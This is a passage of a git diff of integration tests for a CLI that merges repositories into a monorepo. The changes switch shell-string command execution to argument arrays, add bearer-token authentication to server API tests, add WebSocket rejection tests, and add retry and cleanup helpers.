b/tests/fixtures/repo-monorepo-target/packages/existing-pkg/package.json new file mode 100755 index 0000000..18a3854 --- /dev/null +++ b/tests/fixtures/repo-monorepo-target/packages/existing-pkg/package.json @@ -0,0 +1 @@ +{"name":"existing-pkg","version":"1.0.0","dependencies":{"lodash":"^4.17.21"}} diff --git a/tests/helpers/cli-runner.ts b/tests/helpers/cli-runner.ts index ef75edf..3684fed 100755 --- a/tests/helpers/cli-runner.ts +++ b/tests/helpers/cli-runner.ts @@ -1,4 +1,4 @@ -import { execSync } from 'node:child_process'; +import { execSync, execFileSync } from 'node:child_process'; import path from 'node:path'; import os from 'node:os'; import crypto from 'node:crypto'; @@ -74,7 +74,7 @@ export async function createGitRepo( * Run the CLI and return stdout. Throws on non-zero exit. */ export function runCLI(args: string[], cwd?: string): RunResult { - const stdout = execSync(`node "${CLI_PATH}" ${args.join(' ')}`, { + const stdout = execFileSync('node', [CLI_PATH, ...args], { cwd: cwd || process.cwd(), encoding: 'utf-8', stdio: 'pipe', @@ -90,7 +90,7 @@ export function runCLIExpectError( cwd?: string ): RunErrorResult { try { - execSync(`node "${CLI_PATH}" ${args.join(' ')}`, { + execFileSync('node', [CLI_PATH, ...args], { cwd: cwd || process.cwd(), encoding: 'utf-8', stdio: 'pipe', diff --git a/tests/integration/cli-harness.test.ts b/tests/integration/cli-harness.test.ts index 188bf5c..ed02d57 100755 --- a/tests/integration/cli-harness.test.ts +++ b/tests/integration/cli-harness.test.ts @@ -8,6 +8,26 @@ import { treeManifest, } from '../helpers/cli-runner.js'; +/** + * Run a function with retry on transient FS errors (ENOENT during heavy I/O). + */ +function withRetry(fn: () => void, maxRetries = 2): void { + let lastError: unknown; + for (let i = 0; i <= maxRetries; i++) { + try { + fn(); + return; + } catch (error) { + lastError = error; + if (i < maxRetries && error instanceof Error && error.message.includes('ENOENT')) { + continue; + } + throw error; + } + } + throw lastError; +} + /** * Integration test harness that runs the CLI against locally-created * git-initialized fixture repos. No network access is required. @@ -83,19 +103,23 @@ describe('CLI Harness - local fixture repos', () => { describe('merge two repos', () => { let outputDir: string; - beforeAll(() => { + beforeAll(async () => { outputDir = path.join(workDir, 'out-two'); - runCLI([ - 'merge', - repoAlpha, - repoBeta, - '-y', - '-o', - outputDir, - '--no-install', - '--conflict-strategy', - 'highest', - ]); + withRetry(() => { + // Clean up any partial output from a previous attempt + if (fs.existsSync(outputDir)) fs.removeSync(outputDir); + runCLI([ + 'merge', + repoAlpha, + repoBeta, + '-y', + '-o', + outputDir, + '--no-install', + '--conflict-strategy', + 'highest', + ]); + }); }); it('should produce the expected output tree', async () => { @@ -135,20 +159,23 @@ describe('CLI Harness - local fixture repos', () => { describe('merge three repos', () => { let outputDir: string; - beforeAll(() => { + beforeAll(async () => { outputDir = path.join(workDir, 'out-three'); - runCLI([ - 'merge', - repoAlpha, - repoBeta, - repoGamma, - '-y', - '-o', - outputDir, - '--no-install', - '--conflict-strategy', - 'highest', - ]); + withRetry(() => { + if (fs.existsSync(outputDir)) fs.removeSync(outputDir); + runCLI([ + 'merge', + repoAlpha, + repoBeta, + repoGamma, + '-y', + '-o', + outputDir, + '--no-install', + '--conflict-strategy', + 'highest', + ]); + }); }); it('should produce the expected output tree', async () => { diff --git a/tests/integration/error-handling.test.ts b/tests/integration/error-handling.test.ts index ff96b7e..c698f5d 100644 --- a/tests/integration/error-handling.test.ts +++ b/tests/integration/error-handling.test.ts @@ -37,6 +37,7 @@ describe('Error Handling Integration', () => { // Should still return results for valid packages expect(result.packages).toHaveLength(1); expect(result.packages[0].name).toBe('valid-pkg'); + expect(result.warnings?.some((w) => w.type === 'parse-error' && w.source === 'malformed')).toBe(true); }); it('should handle missing package.json gracefully', async () => { @@ -127,6 +128,7 @@ describe('Error Handling Integration', () => { // Should have 2 packages (valid has deps, empty has no deps but valid JSON) expect(result.packages.length).toBeGreaterThanOrEqual(1); + expect(result.warnings?.some((w) => w.type === 'parse-error' && w.source === 'malformed')).toBe(true); }); }); diff --git a/tests/integration/package-manager.test.ts b/tests/integration/package-manager.test.ts index 124df65..4d47e32 100644 --- a/tests/integration/package-manager.test.ts +++ b/tests/integration/package-manager.test.ts @@ -2,7 +2,8 @@ import { describe, it, expect, beforeAll, afterAll, beforeEach, afterEach } from import path from 'node:path'; import fs from 'fs-extra'; import os from 'node:os'; -import { execSync } from 'node:child_process'; +import crypto from 'node:crypto'; +import { execFileSync, execSync } from 'node:child_process'; // Check if yarn is installed function isYarnInstalled(): boolean { @@ -25,6 +26,10 @@ describe('Package Manager Integration', () => { let testRepoDir2: string; const cliPath = path.resolve(__dirname, '../../bin/monorepo.js'); + function run(args: string[]): void { + execFileSync('node', [cliPath, ...args], { stdio: 'pipe' }); + } + beforeAll(async () => { // Create a temp directory for tests tempDir = await fs.mkdtemp(path.join(os.tmpdir(), 'pm-test-')); @@ -61,7 +66,7 @@ describe('Package Manager Integration', () => { let outputDir: string; beforeEach(async () => { - outputDir = path.join(tempDir, `output-${Date.now()}`); + outputDir = path.join(tempDir, `output-${crypto.randomBytes(8).toString('hex')}`); }); afterEach(async () => { @@ -71,9 +76,7 @@ describe('Package Manager Integration', () => { }); it('should merge with pnpm (default)', { retry: FLAKY_TEST_RETRIES }, async () => { - execSync(`node ${cliPath} merge ${testRepoDir1} ${testRepoDir2} -o ${outputDir} -y --no-install`, { - stdio: 'pipe', - }); + run(['merge', testRepoDir1, testRepoDir2, '-o', outputDir, '-y', '--no-install']); // Check pnpm-workspace.yaml exists const workspaceYaml = path.join(outputDir, 'pnpm-workspace.yaml'); @@ -87,9 +90,7 @@ describe('Package Manager Integration', () => { }); it.skipIf(!YARN_INSTALLED)('should merge with yarn', { retry: FLAKY_TEST_RETRIES }, async () => { - execSync(`node ${cliPath} merge ${testRepoDir1} ${testRepoDir2} -o ${outputDir} -y --no-install --package-manager yarn`, { - stdio: 'pipe', - }); + run(['merge', testRepoDir1, testRepoDir2, '-o', outputDir, '-y', '--no-install', '--package-manager', 'yarn']); // Check NO pnpm-workspace.yaml const workspaceYaml = path.join(outputDir, 'pnpm-workspace.yaml'); @@ -103,9 +104,7 @@ describe('Package Manager Integration', () => { }); it('should merge with npm', { retry: FLAKY_TEST_RETRIES }, async () => { - execSync(`node ${cliPath} merge ${testRepoDir1} ${testRepoDir2} -o ${outputDir} -y --no-install --package-manager npm`, { - stdio: 'pipe', - }); + run(['merge', testRepoDir1, testRepoDir2, '-o', outputDir, '-y', '--no-install', '--package-manager', 'npm']); // Check NO pnpm-workspace.yaml const workspaceYaml = path.join(outputDir, 'pnpm-workspace.yaml'); @@ -119,9 +118,7 @@ describe('Package Manager Integration', () => { }); it.skipIf(!YARN_INSTALLED)('should merge with yarn-berry', { retry: FLAKY_TEST_RETRIES }, async () => { - execSync(`node ${cliPath} merge ${testRepoDir1} ${testRepoDir2} -o ${outputDir} -y --no-install --package-manager yarn-berry`, { - stdio: 'pipe', - }); + run(['merge', testRepoDir1, testRepoDir2, '-o', outputDir, '-y', '--no-install', '--package-manager', 'yarn-berry']); // Check NO pnpm-workspace.yaml const workspaceYaml = path.join(outputDir, 'pnpm-workspace.yaml'); @@ -141,9 +138,9 @@ describe('Package Manager Integration', () => { let outputDir: string; beforeEach(async () => { - outputDir = path.join(tempDir, `output-${Date.now()}`); - repoWithPnpm = path.join(tempDir, `repo-pnpm-${Date.now()}`); - repoWithYarn = path.join(tempDir, `repo-yarn-${Date.now()}`); + outputDir = path.join(tempDir, `output-${crypto.randomBytes(8).toString('hex')}`); + repoWithPnpm = path.join(tempDir, `repo-pnpm-${crypto.randomBytes(8).toString('hex')}`); + repoWithYarn = path.join(tempDir, `repo-yarn-${crypto.randomBytes(8).toString('hex')}`); await fs.ensureDir(repoWithPnpm); await fs.ensureDir(repoWithYarn); @@ -174,19 +171,15 @@ describe('Package Manager Integration', () => { } }); - it('should auto-detect pnpm from lock file', async () => { - execSync(`node ${cliPath} merge ${repoWithPnpm} ${testRepoDir1} -o ${outputDir} -y --no-install --auto-detect-pm`, { - stdio: 'pipe', - }); + it('should auto-detect pnpm from lock file', { retry: FLAKY_TEST_RETRIES }, async () => { + run(['merge', repoWithPnpm, testRepoDir1, '-o', outputDir, '-y', '--no-install', '--auto-detect-pm']); const pkgJson = await fs.readJson(path.join(outputDir, 'package.json')); expect(pkgJson.packageManager).toMatch(/^pnpm@/); }); - it.skipIf(!YARN_INSTALLED)('should auto-detect yarn from lock file', async () => { - execSync(`node ${cliPath} merge ${repoWithYarn} ${testRepoDir1} -o ${outputDir} -y --no-install --auto-detect-pm`, { - stdio: 'pipe', - }); + it.skipIf(!YARN_INSTALLED)('should auto-detect yarn from lock file', { retry: FLAKY_TEST_RETRIES }, async () => { + run(['merge', repoWithYarn, testRepoDir1, '-o', outputDir, '-y', '--no-install', '--auto-detect-pm']); const pkgJson = await fs.readJson(path.join(outputDir, 'package.json')); expect(pkgJson.packageManager).toMatch(/^yarn@/); @@ -197,7 +190,7 @@ describe('Package Manager Integration', () => { let initDir: string; beforeEach(async () => { - initDir = path.join(tempDir, `init-${Date.now()}`); + initDir = path.join(tempDir, `init-${crypto.randomBytes(8).toString('hex')}`); }); afterEach(async () => { @@ -206,20 +199,16 @@ describe('Package Manager Integration', () => { } }); - it('should init with pnpm (default)', async () => { - execSync(`node ${cliPath} init ${initDir} --no-git`, { - stdio: 'pipe', - }); + it('should init with pnpm (default)', { retry: FLAKY_TEST_RETRIES }, async () => { + run(['init', initDir, '--no-git']); const pkgJson = await fs.readJson(path.join(initDir, 'package.json')); expect(pkgJson.packageManager).toMatch(/^pnpm@/); expect(await fs.pathExists(path.join(initDir, 'pnpm-workspace.yaml'))).toBe(true); }); - it.skipIf(!YARN_INSTALLED)('should init with yarn', async () => { - execSync(`node ${cliPath} init ${initDir} --no-git --package-manager yarn`, { - stdio: 'pipe', - }); + it.skipIf(!YARN_INSTALLED)('should init with yarn', { retry: FLAKY_TEST_RETRIES }, async () => { + run(['init', initDir, '--no-git', '--package-manager', 'yarn']); const pkgJson = await fs.readJson(path.join(initDir, 'package.json')); expect(pkgJson.packageManager).toMatch(/^yarn@/); @@ -227,10 +216,8 @@ describe('Package Manager Integration', () => { expect(await fs.pathExists(path.join(initDir, 'pnpm-workspace.yaml'))).toBe(false); }); - it('should init with npm', async () => { - execSync(`node ${cliPath} init ${initDir} --no-git --package-manager npm`, { - stdio: 'pipe', - }); + it('should init with npm', { retry: FLAKY_TEST_RETRIES }, async () => { + run(['init', initDir, '--no-git', '--package-manager', 'npm']); const pkgJson = await fs.readJson(path.join(initDir, 'package.json')); expect(pkgJson.packageManager).toMatch(/^npm@/); diff --git a/tests/integration/plan-apply.test.ts b/tests/integration/plan-apply.test.ts index 8c48b52..e59d668 100755 --- a/tests/integration/plan-apply.test.ts +++ b/tests/integration/plan-apply.test.ts @@ -246,4 +246,58 @@ describe('plan → apply roundtrip', () => { expect(tree).toContain('package.json'); expect(tree).toContain('README.md'); }); + + it('plan + apply + verify roundtrip should pass static verification', async () => { + const repo1 = await createGitRepo(testDir, 'pkg-x', { + name: 'pkg-x', + version: '1.0.0', + dependencies: { lodash: '^4.17.21' }, + scripts: { build: 'tsc', test: 'vitest' }, + }, { + 'src/index.ts': 'export const x = 1;\n', + }); + + const repo2 = await createGitRepo(testDir, 'pkg-y', { + name: 'pkg-y', + version: '2.0.0', + dependencies: { express: '^4.18.0' }, + scripts: { test: 'jest' }, + }, { + 'src/index.ts': 'export const y = 2;\n', + }); + + const planFile = path.join(testDir, 'verify.plan.json'); + const outDir = path.join(testDir, 'verify-out'); + + // Phase 1: plan + runCLI([ + 'plan', + repo1, repo2, + '-o', outDir, + '--plan-file', planFile, + '-y', + '--no-install', + '--conflict-strategy', 'highest', + ]); + + // Phase 2: apply + runCLI([ + 'apply', + '--plan', planFile, + '--out', outDir, + ]); + + // Phase 3: verify (static tier should pass) + const verifyResult = runCLI([ + 'verify', + '--dir', outDir, + '--tier', 'static', + '--json', + ]); + + const result = JSON.parse(verifyResult.stdout); + expect(result.ok).toBe(true); + expect(result.tier).toBe('static'); + expect(result.summary.fail).toBe(0); + }); }); diff --git a/tests/integration/prepare-plan-apply.test.ts b/tests/integration/prepare-plan-apply.test.ts new file mode 100644 index 0000000..5e53be4 --- /dev/null +++ b/tests/integration/prepare-plan-apply.test.ts @@ -0,0 +1,95 @@ +import { describe, it, expect, beforeEach, afterEach } from 'vitest'; +import path from 'node:path'; +import os from 'node:os'; +import crypto from 'node:crypto'; +import fs from 'fs-extra'; +import { createGitRepo, runCLI } from '../helpers/cli-runner.js'; + +describe('prepare -> plan -> apply integration', () => { + let testDir: string; + + beforeEach(async () => { + const id = crypto.randomBytes(8).toString('hex'); + testDir = path.join(os.tmpdir(), `prepare-plan-apply-${id}`); + await fs.ensureDir(testDir); + }); + + afterEach(async () => { + await fs.remove(testDir).catch(() => {}); + }); + + it('produces a valid monorepo from prepared repos', async () => { + const repoA = await createGitRepo(testDir, 'repo-a', { + name: 'repo-a', + version: '1.0.0', + scripts: { test: 'vitest' }, + dependencies: { lodash: '^4.17.21' }, + }, { + 'src/index.ts': 'export const a = 1;\n', + }); + + const repoB = await createGitRepo(testDir, 'repo-b', { + name: 'repo-b', + version: '1.0.0', + scripts: { lint: 'echo lint' }, + dependencies: { express: '^4.18.0' }, + }, { + 'src/index.ts': 'export const b = 2;\n', + }); + + const workspace = path.join(testDir, 'prep-workspace'); + const outDir = path.join(testDir, 'monorepo-out'); + const planFile = path.join(testDir, 'monorepo.plan.json'); + + // 1) Prepare source repos in a workspace copy. + runCLI([ + 'prepare', + repoA, + repoB, + '--node-version', + '20', + '--prep-workspace', + workspace, + ]); + + const preparedRepoA = path.join(workspace, 'repo-a'); + const preparedRepoB = path.join(workspace, 'repo-b'); + + expect(await fs.pathExists(path.join(preparedRepoA, '.nvmrc'))).toBe(true); + expect(await fs.pathExists(path.join(preparedRepoB, '.nvmrc'))).toBe(true); + + // 2) Plan from prepared repos. + runCLI([ + 'plan', + preparedRepoA, + preparedRepoB, + '-o', + outDir, + '--plan-file', + planFile, + '--no-install', + '-y', + ]); + + expect(await fs.pathExists(planFile)).toBe(true); + + // 3) Apply plan. + runCLI([ + 'apply', + '--plan', + planFile, + '--out', + outDir, + ]); + + // 4) Validate resulting monorepo structure. + expect(await fs.pathExists(path.join(outDir, 'package.json'))).toBe(true); + expect(await fs.pathExists(path.join(outDir, 'packages', 'repo-a', 'src', 'index.ts'))).toBe(true); + expect(await fs.pathExists(path.join(outDir, 'packages', 'repo-b', 'src', 'index.ts'))).toBe(true); + + const rootPkg = await fs.readJson(path.join(outDir, 'package.json')); + expect(rootPkg.private).toBe(true); + expect(rootPkg.dependencies?.lodash).toBeDefined(); + expect(rootPkg.dependencies?.express).toBeDefined(); + }); +}); diff --git a/tests/integration/remote-clone.test.ts b/tests/integration/remote-clone.test.ts index b89b516..1092c2b 100644 --- a/tests/integration/remote-clone.test.ts +++ b/tests/integration/remote-clone.test.ts @@ -385,6 +385,7 @@ describe('Remote Cloning Integration', () => { cloneOrCopyRepos(sources, testDir, { logger: mockLogger, maxRetries: 1, + concurrency: 1, // Sequential so failure stops before third repo }) ).rejects.toThrow(/Repository not found/); diff --git a/tests/integration/server-api.test.ts b/tests/integration/server-api.test.ts index 1968619..752adf3 100755 --- a/tests/integration/server-api.test.ts +++ b/tests/integration/server-api.test.ts @@ -9,17 +9,37 @@ import { createServer } from '../../src/server/index.js'; const fixturesDir = path.resolve(__dirname, '../fixtures'); let server: http.Server; +let authToken: string; let wsUrl: string; // Track artifacts for cleanup const cleanupPaths: string[] = []; +/** Supertest agent pre-configured with Bearer auth */ +function api() { + return request(server); +} + +function authPost(path: string) { + return api().post(path).set('Authorization', `Bearer ${authToken}`); +} + +function authGet(path: string) { + return api().get(path).set('Authorization', `Bearer ${authToken}`); +} + +function authPut(path: string) { + return api().put(path).set('Authorization', `Bearer ${authToken}`); +} + beforeAll(async () => { - server = createServer({ port: 0 }); // OS-assigned port + const result = createServer({ port: 0 }); // OS-assigned port + server = result.server; + authToken = result.token; await new Promise((resolve) => { server.on('listening', () => { const addr = server.address() as { port: number }; - wsUrl = `ws://localhost:${addr.port}/ws`; + wsUrl = `ws://127.0.0.1:${addr.port}/ws?token=${authToken}`; resolve(); }); }); @@ -77,8 +97,7 @@ function collectEvents( async function generatePlanViaApi(repos: string[]): Promise { const ws = await openWs(); try { - const res = await request(server) - .post('/api/plan') + const res = await authPost('/api/plan') .send({ repos }) .expect(202); @@ -99,10 +118,25 @@ async function generatePlanViaApi(repos: string[]): Promise { } } +describe('CORS and middleware', () => { + it('should respond 204 to OPTIONS preflight request', async () => { + await api() + .options('/api/analyze') + .expect(204); + }); + + it('should set CORS headers', async () => { + const res = await api() + .options('/api/analyze'); + + expect(res.headers['access-control-allow-methods']).toContain('GET'); + expect(res.headers['access-control-allow-headers']).toContain('Authorization'); + }); +}); + describe('POST /api/analyze', () => { it('returns 202 with opId for valid repos', async () => { - const res = await request(server) - .post('/api/analyze') + const res = await authPost('/api/analyze') .send({ repos: [path.join(fixturesDir, 'repo-a')] }) .expect(202); @@ -111,31 +145,49 @@ describe('POST /api/analyze', () => { }); it('returns 400 for empty repos', async () => { - await request(server) - .post('/api/analyze') + await authPost('/api/analyze') .send({ repos: [] }) .expect(400); }); it('returns 400 for missing repos field', async () => { - await request(server) - .post('/api/analyze') + await authPost('/api/analyze') .send({}) .expect(400); }); it('returns 400 for non-array repos', async () => { - await request(server) - .post('/api/analyze') + await authPost('/api/analyze') .send({ repos: 'not-an-array' }) .expect(400); }); + it('returns 401 without auth token', async () => { + await api() + .post('/api/analyze') + .send({ repos: [path.join(fixturesDir, 'repo-a')] }) + .expect(401); + }); + + it('streams error event for nonexistent repo paths', async () => { + const ws = await openWs(); + try { + const res = await authPost('/api/analyze') + .send({ repos: ['/nonexistent/path/repo'] }) + .expect(202); + + const events = await collectEvents(ws, res.body.opId); + const errorEvents = events.filter((e) => e.type === 'error'); + expect(errorEvents.length).toBeGreaterThanOrEqual(1); + } finally { + ws.close(); + } + }, 60000); + it('streams result over WebSocket', async () => { const ws = await openWs(); try { - const res = await request(server) - .post('/api/analyze') + const res = await authPost('/api/analyze') .send({ repos: [path.join(fixturesDir, 'repo-a'), path.join(fixturesDir, 'repo-b')] }) .expect(202); @@ -160,8 +212,7 @@ describe('POST /api/analyze', () => { describe('POST /api/plan', () => { it('returns 202 with opId', async () => { - const res = await request(server) - .post('/api/plan') + const res = await authPost('/api/plan') .send({ repos: [path.join(fixturesDir, 'repo-a')] }) .expect(202); @@ -185,17 +236,30 @@ describe('POST /api/plan', () => { }, 60000); it('returns 400 for empty repos', async () => { - await request(server) - .post('/api/plan') + await authPost('/api/plan') .send({ repos: [] }) .expect(400); }); + it('streams error event for nonexistent repo paths', async () => { + const ws = await openWs(); + try { + const res = await authPost('/api/plan') + .send({ repos: ['/nonexistent/path/repo'] }) + .expect(202); + + const events = await collectEvents(ws, res.body.opId); + const errorEvents = events.filter((e) => e.type === 'error'); + expect(errorEvents.length).toBeGreaterThanOrEqual(1); + } finally { + ws.close(); + } + }, 60000); + it('receives plan result via WebSocket', async () => { const ws = await openWs(); try { - const res = await request(server) - .post('/api/plan') + const res = await authPost('/api/plan') .send({ repos: [path.join(fixturesDir, 'repo-a'), path.join(fixturesDir, 'repo-b')], options: { conflictStrategy: 'highest' }, @@ -225,8 +289,7 @@ describe('POST /api/verify', () => { const ws = await openWs(); try { - const verifyRes = await request(server) - .post('/api/verify') + const verifyRes = await authPost('/api/verify') .send({ plan: planPath }) .expect(202); @@ -244,26 +307,72 @@ describe('POST /api/verify', () => { }, 60000); it('returns 400 when neither plan nor dir specified', async () => { - await request(server) - .post('/api/verify') + await authPost('/api/verify') .send({}) .expect(400); }); it('returns 400 when both plan and dir specified', async () => { - await request(server) - .post('/api/verify') + await authPost('/api/verify') .send({ plan: 'a', dir: 'b' }) .expect(400); }); + + it('streams error event for nonexistent plan file', async () => { + const ws = await openWs(); + try { + const res = await authPost('/api/verify') + .send({ plan: '/nonexistent/path/plan.json' }) + .expect(202); + + const events = await collectEvents(ws, res.body.opId); + const errorEvents = events.filter((e) => e.type === 'error'); + expect(errorEvents.length).toBeGreaterThanOrEqual(1); + } finally { + ws.close(); + } + }, 60000); + + it('verifies a real directory with dir option', async () => { + const ws = await openWs(); + try { + const res = await authPost('/api/verify') + .send({ dir: path.join(fixturesDir, 'repo-a') }) + .expect(202); + + const events = await collectEvents(ws, res.body.opId); + const resultEvents = events.filter((e) => e.type === 'result'); + expect(resultEvents).toHaveLength(1); + + const result = resultEvents[0].data as Record; + expect(result).toHaveProperty('checks'); + expect(result).toHaveProperty('summary'); + } finally { + ws.close(); + } + }, 60000); + + it('streams error for nonexistent dir', async () => { + const ws = await openWs(); + try { + const res = await authPost('/api/verify') + .send({ dir: '/nonexistent/monorepo/path' }) + .expect(202); + + const events = await collectEvents(ws, res.body.opId); + const errorEvents = events.filter((e) => e.type === 'error'); + expect(errorEvents.length).toBeGreaterThanOrEqual(1); + } finally { + ws.close(); + } + }, 60000); }); describe('POST /api/apply', () => { it('returns 202 with opId for valid plan', async () => { const planPath = await generatePlanViaApi([path.join(fixturesDir, 'repo-a')]); - const res = await request(server) - .post('/api/apply') + const res = await authPost('/api/apply') .send({ plan: planPath }) .expect(202); @@ -276,29 +385,41 @@ describe('POST /api/apply', () => { } finally { ws.close(); } - }, 60000); + }, 90000); it('returns 400 for missing plan', async () => { - await request(server) - .post('/api/apply') + await authPost('/api/apply') .send({}) .expect(400); }); + + it('streams error event for nonexistent plan file', async () => { + const ws = await openWs(); + try { + const res = await authPost('/api/apply') + .send({ plan: '/nonexistent/path/plan.json' }) + .expect(202); + + const events = await collectEvents(ws, res.body.opId); + const errorEvents = events.filter((e) => e.type === 'error'); + expect(errorEvents.length).toBeGreaterThanOrEqual(1); + } finally { + ws.close(); + } + }, 60000); }); describe('GET /api/status/:opId', () => { it('returns buffered events after operation completes', async () => { const ws = await openWs(); try { - const res = await request(server) - .post('/api/analyze') + const res = await authPost('/api/analyze') .send({ repos: [path.join(fixturesDir, 'repo-a')] }) .expect(202); await collectEvents(ws, res.body.opId); - const statusRes = await request(server) - .get(`/api/status/${res.body.opId}`) + const statusRes = await authGet(`/api/status/${res.body.opId}`) .expect(200); expect(statusRes.body).toHaveProperty('events'); @@ -310,8 +431,7 @@ describe('GET /api/status/:opId', () => { }, 60000); it('returns 404 for unknown opId', async () => { - await request(server) - .get('/api/status/nonexistent-op') + await authGet('/api/status/nonexistent-op') .expect(404); }); }); @@ -320,8 +440,7 @@ describe('WebSocket', () => { it('subscribe receives log events', async () => { const ws = await openWs(); try { - const res = await request(server) - .post('/api/analyze') + const res = await authPost('/api/analyze') .send({ repos: [path.join(fixturesDir, 'repo-a')] }) .expect(202); @@ -338,6 +457,43 @@ describe('WebSocket', () => { ws.close(); } }, 60000); + + it('should reject WebSocket upgrade on non-/ws path', async () => { + const addr = server.address() as { port: number }; + const ws = new WebSocket(`ws://127.0.0.1:${addr.port}/not-ws?token=${authToken}`); + + await new Promise((resolve) => { + ws.on('error', () => resolve()); + ws.on('close', () => resolve()); + }); + + // Connection should have been destroyed + expect(ws.readyState).toBeGreaterThanOrEqual(2); // CLOSING or CLOSED + }); + + it('should reject WebSocket upgrade with invalid token', async () => { + const addr = server.address() as { port: number }; + const ws = new WebSocket(`ws://127.0.0.1:${addr.port}/ws?token=wrong-token`); + + await new Promise((resolve) => { + ws.on('error', () => resolve()); + ws.on('close', () => resolve()); + }); + + expect(ws.readyState).toBeGreaterThanOrEqual(2); // CLOSING or CLOSED + }); + + it('should reject WebSocket upgrade with no token', async () => { + const addr = server.address() as { port: number }; + const ws = new WebSocket(`ws://127.0.0.1:${addr.port}/ws`); + + await new Promise((resolve) => { + ws.on('error', () => resolve()); + ws.on('close', () => resolve()); + }); + + expect(ws.readyState).toBeGreaterThanOrEqual(2); // CLOSING or CLOSED + }); }); // ─── Wizard State Endpoints ───────────────────────────────────────────── @@ -349,11 +505,11 @@ describe('GET /api/wizard/state', () => { try { await fs.remove(monotizeDir); } catch { /* ignore */ } }); - it('returns { exists: false, state: null } when no config', async () => { + it('returns { exists: false, state: null } when no config (no auth required)', async () => { // Ensure no leftover state await fs.remove(monotizeDir); - const res = await request(server) + const res = await api() .get('/api/wizard/state') .expect(200); @@ -368,8 +524,7 @@ describe('POST /api/wizard/init', () => { }); it('creates default state and returns it', async () => { - const res = await request(server) - .post('/api/wizard/init') + const res = await authPost('/api/wizard/init') .send({ repos: [path.join(fixturesDir, 'repo-a')] }) .expect(200); @@ -381,15 +536,13 @@ describe('POST /api/wizard/init', () => { }); it('returns 400 for missing repos', async () => { - await request(server) - .post('/api/wizard/init') + await authPost('/api/wizard/init') .send({}) .expect(400); }); it('returns 400 for empty repos', async () => { - await request(server) - .post('/api/wizard/init') + await authPost('/api/wizard/init') .send({ repos: [] }) .expect(400); }); @@ -402,23 +555,21 @@ describe('PUT /api/wizard/state', () => { it('saves state to disk', async () => { // First init - const initRes = await request(server) - .post('/api/wizard/init') + const initRes = await authPost('/api/wizard/init') .send({ repos: ['./repo-a'] }) .expect(200); const state = initRes.body.state; state.currentStep = 'prepare'; - const putRes = await request(server) - .put('/api/wizard/state') + const putRes = await authPut('/api/wizard/state') .send(state) .expect(200); expect(putRes.body).toEqual({ ok: true }); - // Verify persisted - const getRes = await request(server) + // Verify persisted (GET wizard/state does not require auth) + const getRes = await api() .get('/api/wizard/state') .expect(200); @@ -427,8 +578,7 @@ describe('PUT /api/wizard/state', () => { }); it('returns 400 for invalid state', async () => { - await request(server) - .put('/api/wizard/state') + await authPut('/api/wizard/state') .send({ notAState: true }) .expect(400); }); @@ -438,8 +588,7 @@ describe('PUT /api/wizard/state', () => { describe('POST /api/prepare', () => { it('returns 202 with opId for valid repos', async () => { - const res = await request(server) - .post('/api/prepare') + const res = await authPost('/api/prepare') .send({ repos: [path.join(fixturesDir, 'repo-a')] }) .expect(202); @@ -449,8 +598,7 @@ describe('POST /api/prepare', () => { it('streams prepare result over WebSocket', async () => { const ws = await openWs(); try { - const res = await request(server) - .post('/api/prepare') + const res = await authPost('/api/prepare') .send({ repos: [path.join(fixturesDir, 'repo-a')] }) .expect(202); @@ -468,11 +616,89 @@ describe('POST /api/prepare', () => { }, 60000); it('returns 400 for empty repos', async () => { - await request(server) - .post('/api/prepare') + await authPost('/api/prepare') .send({ repos: [] }) .expect(400); }); + + it('streams error event for nonexistent repo paths', async () => { + const ws = await openWs(); + try { + const res = await authPost('/api/prepare') + .send({ repos: ['/nonexistent/path/repo'] }) + .expect(202); + + const events = await collectEvents(ws, res.body.opId); + const errorEvents = events.filter((e) => e.type === 'error'); + expect(errorEvents.length).toBeGreaterThanOrEqual(1); + } finally { + ws.close(); + } + }, 60000); +}); + +// ─── Add Endpoint ─────────────────────────────────────────────────────── + +describe('POST /api/add', () => { + it('returns 400 for missing repo', async () => { + await authPost('/api/add') + .send({ targetMonorepo: '/tmp/mono' }) + .expect(400); + }); + + it('returns 400 for missing targetMonorepo', async () => { + await authPost('/api/add') + .send({ repo: './some-repo' }) + .expect(400); + }); + + it('returns 400 for non-string repo', async () => { + await authPost('/api/add') + .send({ repo: 123, targetMonorepo: '/tmp/mono' }) + .expect(400); + }); + + it('returns 202 with opId for valid input', async () => { + const res = await authPost('/api/add') + .send({ repo: './tests/fixtures/repo-a', targetMonorepo: '/tmp/mono-test' }) + .expect(202); + + expect(res.body).toHaveProperty('opId'); + }); +}); + +// ─── Migrate Branch Endpoint ──────────────────────────────────────────── + +describe('POST /api/migrate-branch', () => { + it('returns 400 for missing branch', async () => { + await authPost('/api/migrate-branch') + .send({ sourceRepo: './repo', targetMonorepo: '/tmp/mono' }) + .expect(400); + }); + + it('returns 400 for missing sourceRepo', async () => { + await authPost('/api/migrate-branch') + .send({ branch: 'feature', targetMonorepo: '/tmp/mono' }) + .expect(400); + }); + + it('returns 400 for missing targetMonorepo', async () => { + await authPost('/api/migrate-branch') + .send({ branch: 'feature', sourceRepo: './repo' }) + .expect(400); + }); + + it('returns 202 with opId for valid input', async () => { + const res = await authPost('/api/migrate-branch') + .send({ + branch: 'feature', + sourceRepo: './tests/fixtures/repo-a', + targetMonorepo: '/tmp/mono-test', + }) + .expect(202); + + expect(res.body).toHaveProperty('opId'); + }); }); // ─── Configure Endpoint ───────────────────────────────────────────────── @@ -485,8 +711,7 @@ describe('POST /api/configure', () => { }); it('returns 202 with opId for valid input', async () => { - const res = await request(server) - .post('/api/configure') + const res = await authPost('/api/configure') .send({ packagesDir: 'packages', packageNames: ['app-a'], baseDir: configureTmpDir }) .expect(202); @@ -494,15 +719,13 @@ describe('POST /api/configure', () => { }); it('returns 400 for missing packagesDir', async () => { - await request(server) - .post('/api/configure') + await authPost('/api/configure') .send({ packageNames: ['app-a'] }) .expect(400); }); it('returns 400 for empty packageNames', async () => { - await request(server) - .post('/api/configure') + await authPost('/api/configure') .send({ packagesDir: 'packages', packageNames: [] }) .expect(400); }); @@ -516,8 +739,7 @@ describe('POST /api/archive', () => { delete process.env.GITHUB_TOKEN; try { - const res = await request(server) - .post('/api/archive') + const res = await authPost('/api/archive') .send({ repos: ['./repo-a'] }) .expect(400); @@ -528,8 +750,7 @@ describe('POST /api/archive', () => { }); it('returns 400 for missing repos', async () => { - await request(server) - .post('/api/archive') + await authPost('/api/archive') .send({}) .expect(400); }); @@ -539,8 +760,7 @@ describe('POST /api/archive', () => { process.env.GITHUB_TOKEN = 'test-token'; try { - const res = await request(server) - .post('/api/archive') + const res = await authPost('/api/archive') .send({ repos: ['./repo-a'] }) .expect(200); diff --git a/tests/integration/turbo-nx-generation.test.ts 